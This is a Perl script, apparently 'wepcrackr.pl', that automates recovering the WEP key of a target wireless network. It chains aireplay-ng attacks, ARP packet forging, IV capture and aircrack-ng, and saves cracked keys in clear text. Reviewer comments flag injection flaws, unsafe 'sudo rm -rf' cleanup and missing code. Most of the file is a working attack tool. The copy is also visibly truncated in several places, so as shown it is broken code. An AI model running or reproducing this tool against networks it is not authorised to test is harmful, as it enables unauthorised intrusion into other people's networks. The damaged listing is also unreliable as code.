#!usr/bin/perl
# 2.0 changes: added file checking, recursion, log file of cracked APs
$recursive = 0; # <-- 0 = off, 1 = on (keep trying if no key found)

# ---------------------------------------------------------------------------
# Review notes
#
# Purpose: a wrapper that runs wpa_supplicant, aireplay-ng, packetforge-ng,
# airodump-ng and aircrack-ng in sequence against one WEP network, then scans
# the aircrack-ng output file for a "KEY FOUND" line.
# Positional arguments: bssid channel essid mac interface attack [attempt].
#
# State of this copy: the listing arrived with its line breaks collapsed and
# with some text missing (see the notes in banner(), at the bare `glob`, and
# at `while ()`). Statements are re-flowed one per line; no code token was
# changed. `$recursive` is kept on line 3 because two runtime messages refer
# to "line 3".
#
# The shebang has no leading slash, so it names a relative interpreter path;
# the script re-invokes itself as `perl wepcrackr.pl` in stop().
#
# Security-relevant points visible in the code:
#  * Every external command is a single string with @ARGV values
#    interpolated, and most run under sudo. Perl passes such a string to the
#    shell when it contains metacharacters, so an ESSID (or any argument)
#    containing spaces, quotes, ';' or '$(...)' changes what runs as root.
#    The list forms of system()/exec() avoid the shell.
#  * $essid and $bssid are written into wpa_supplicant.conf unescaped; a
#    double quote or newline in the ESSID alters the generated config.
#  * clean() runs `sudo rm -rf` on relative names and globs, so it removes
#    whatever matches in the directory the script is started from.
#  * A recovered key is appended in clear text to wireless_cracked.txt.
#  * All open() calls are two-argument, use bareword handles and are not
#    checked for failure.
#  * No `use strict` / `use warnings`; every variable is a package global.
#  * The generated config uses key_mgmt=NONE with wep_key0, i.e. the flow is
#    specific to WEP. The replay stage re-sends the forged ARP request file
#    on mon0; presumably that repeated traffic from one client MAC is what a
#    wireless IDS would observe -- depends on aireplay-ng behaviour not
#    shown here.
# ---------------------------------------------------------------------------

# Print the banner/usage text, then exit.
sub banner {
    # NOTE(review): the here-document that held the banner text is truncated
    # in this copy; only the tail of the usage line and the EOF terminator
    # survive, so the next line is not valid Perl as shown. Left as found.
    # As written, banner() always ends in exit and is called unconditionally
    # below -- presumably a guard was lost along with the text; confirm
    # against the original file.
    print< <4/5> (4 = chopchop attack, 5 = fragmentation attack) EOF
    exit;
}

# Remove the working files this script and the aircrack-ng tools create.
# Paths are relative to the current directory and the globs are expanded by
# the shell, all under sudo.
sub clean {
    system("sudo rm -rf arp-request");
    system("sudo rm -rf capture*.*");
    system("sudo rm -rf replay_*.*");
    system("sudo rm -rf cracked_wep.txt");
    system("sudo rm -rf wpa_supplicant.conf");
}

# Failure path: clean up, report, and either exit or (when $recursive is 1)
# replace this process with a fresh run that carries the attempt counter.
sub stop {
    print "[+] Cleaning up... again \n";
    &clean;
    if($recursive == 0){print "[+] Recursivity disabled in source (line 3) \n";}
    print "[-] Cracking WEP failed \n";
    # Arguments are interpolated unquoted into one shell string run via sudo.
    if($recursive == 1){exec("sudo perl wepcrackr.pl $bssid $channel $essid $mac $interface $attack $attempt");}
    exit;
}

# Positional arguments, taken as-is with no validation.
$bssid = $ARGV[0]; # tried using "shift @_" (outside a subroutine) and "@argv", but it didn't work; cheers clone4 anyway :D
$channel = $ARGV[1];
$essid = $ARGV[2];
$mac = $ARGV[3];
$interface = $ARGV[4];   # only used for wpa_supplicant; other tools use mon0
$attack = $ARGV[5];
$attempt = $ARGV[6];     # optional; set by the re-exec in stop()

system("clear");
&banner;

# Attempt counter: report and increment when one was passed in, otherwise
# start at 2 so that a re-exec is labelled as the second attempt.
if($attempt > 0){
    # The string literal below contains a line break in this copy; it is
    # reproduced unchanged.
    print "[+] Attempt no. 
$attempt \n";
    $attempt = $attempt + 1;
}
if(!$attempt){$attempt = 2;}

print "[+] Cleaning before cracking \n";
&clean;

# Write a wpa_supplicant config for the target with a placeholder WEP key.
# open() is unchecked; $essid/$bssid are written without escaping.
open (config, ">wpa_supplicant.conf");
print config "network={\n";
print config " ssid=\"$essid\"\n";
print config " key_mgmt=NONE\n";
print config " bssid=$bssid\n";
print config " wep_key0=\"fakekey\"\n";
print config "}\n";
close (config);

if (!defined($pid = fork())) {
    # fork failed; execution still falls through to the result parsing below.
    print "resources not avilable.\n";
} elsif ($pid == 0) {
    # Child: run wpa_supplicant in an xterm with the config written above.
    use Cwd qw(realpath);
    # Strips the last 12 characters of the resolved script path to get its
    # directory; 12 is the length of "wepcrackr.pl", so this assumes the
    # script has not been renamed.
    my $fullpath = substr(realpath($0), 0, -12);
    exec("xterm -e sudo wpa_supplicant -c".$fullpath."wpa_supplicant.conf -Dwext -i$interface");
} else {
    # Parent: drives the remaining tools.
    print "[+] Associating with $essid \n";
    sleep 2;   # fixed delay; nothing checks that association succeeded
    if ($attack == 4){
        print "[+] Performing chopchop attack \n";
    }
    if ($attack == 5){
        print "[+] Performing fragmentation attack \n";
    }
    # NOTE(review): (4||5) evaluates to 4, so this is `$attack != 4`. With
    # attack 5 the message above is printed and then this branch also runs.
    if ($attack != (4||5)){
        print "[-] Only attack types 4 & 5 supported \n";
        kill 15, $pid;   # 15 = SIGTERM
        &stop;
    }
    # $attack, $mac and $bssid are interpolated into a shell string.
    system("xterm -e sudo aireplay-ng -$attack -F -h $mac -a $bssid mon0");
    # NOTE(review): `glob` has no argument here, so it expands $_; the
    # message suggests a replay_*.xor pattern was intended and was lost in
    # this copy -- confirm against the original.
    if (!glob){
        print "[-] Replay_*.xor couldn't be found!\n";
        kill 15, $pid;
        &stop;
    }
    print "[+] ";
    # Builds the arp-request file from the replay_*.xor file; the glob is
    # expanded by the shell and may match more than one file.
    system("sudo packetforge-ng -0 -h $mac -a $bssid -k 255.255.255.255 -l 255.255.255.255 -y replay_*.xor -w arp-request mon0");
    if (!defined($airodumpid = fork())) {
        die "cannot fork: $!";
    } elsif ($airodumpid == 0) {
        # Child: capture to files prefixed "capture" in the current directory.
        print "[+] Capturing IV's \n";
        exec("xterm -e sudo airodump-ng -c $channel --bssid $bssid -w capture mon0");
    } else {
        if (!defined($aireplayid = fork())) {
            die "cannot fork: $!";
        } elsif ($aireplayid == 0) {
            # Child: replay the arp-request file written by packetforge-ng.
            print "[+] Sending ARP requests \n";
            exec("xterm -e sudo aireplay-ng -2 -F -r arp-request mon0");
        }else{
            print "[+] Cracking IV's \n";
            # Busy-wait with no sleep and no timeout until capture-01.cap is
            # non-empty and capture-01.txt exists.
            $filehasdata = 0;
            while ($filehasdata == 0){
                if ( (-s "capture-01.cap") && (-e "capture-01.txt") ){
                    $filehasdata = 1;
                }
            }
            # Output is redirected by the shell into cracked_wep.txt, which
            # is parsed below.
            system("sudo aircrack-ng -q -b $bssid capture*.cap > cracked_wep.txt");
            # The "threads" are the three forked child processes.
            print "[+] Killing threads \n";
            kill 15, $aireplayid;
            kill 15, $airodumpid;
            kill 15, $pid;
        }
    }
}

# Parse the aircrack-ng output. open() is two-argument and unchecked.
open(KEY, "cracked_wep.txt");
# NOTE(review): the loop condition is empty in this copy; the body reads $_
# per line, so a readline on KEY was presumably here -- left as found.
while (){
    my($line) = $_;
    chomp($line);
    # Upper-cases the line. Inside tr/// the brackets are literal characters,
    # not a character class; the mapping is still a-z -> A-Z.
    $line =~ tr/[a-z]/[A-Z]/;
    if($line =~ m/KEY FOUND/){
        # Keeps everything from offset 11 of the matching line as the key.
        $line = substr($line, 11);
        $wep_key = $line;
    }
}
close(KEY);

print "[+] Cleaning up... again \n";
&clean;

# Append the result to a clear-text log in the current directory.
if($wep_key){
    open(SAVEDKEYS, ">>wireless_cracked.txt");
    print SAVEDKEYS "BSSID: $bssid \n";
    print SAVEDKEYS "ESSID: $essid \n";
    print SAVEDKEYS "channel: $channel \n";
    print SAVEDKEYS "key: $wep_key \n\n";
    close (SAVEDKEYS);
}

# Report, or repeat the failure handling from stop() inline (without the
# extra clean() call and without the final exit).
if($wep_key){
    print "[!] Wep key: $wep_key \n";
}else{
    if($recursive == 0){print "[+] Recursivity disabled in source (line 3) \n";}
    print "[-] Cracking WEP failed \n";
    if($recursive == 1){exec("sudo perl wepcrackr.pl $bssid $channel $essid $mac $interface $attack $attempt");}
}